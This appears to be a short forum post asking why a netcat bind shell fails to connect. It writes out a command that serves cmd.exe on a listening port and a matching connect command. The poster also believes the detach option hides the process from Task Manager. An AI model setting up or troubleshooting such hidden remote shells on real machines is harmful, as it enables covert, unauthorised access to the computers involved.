When I give the command nc -L -d -p (port #) -e cmd.exe and try to connect later using
nc -v (ip address) (port #) i cannot get a shell. the -d option makes nc run in detached mode which means that it runs in the background and the command window can be closed, and it will not show in task mngr...right? i have done a lot of research and for some damn reason i cannot get the ****er to connect. your help will be greatly appreciated!
thanxs
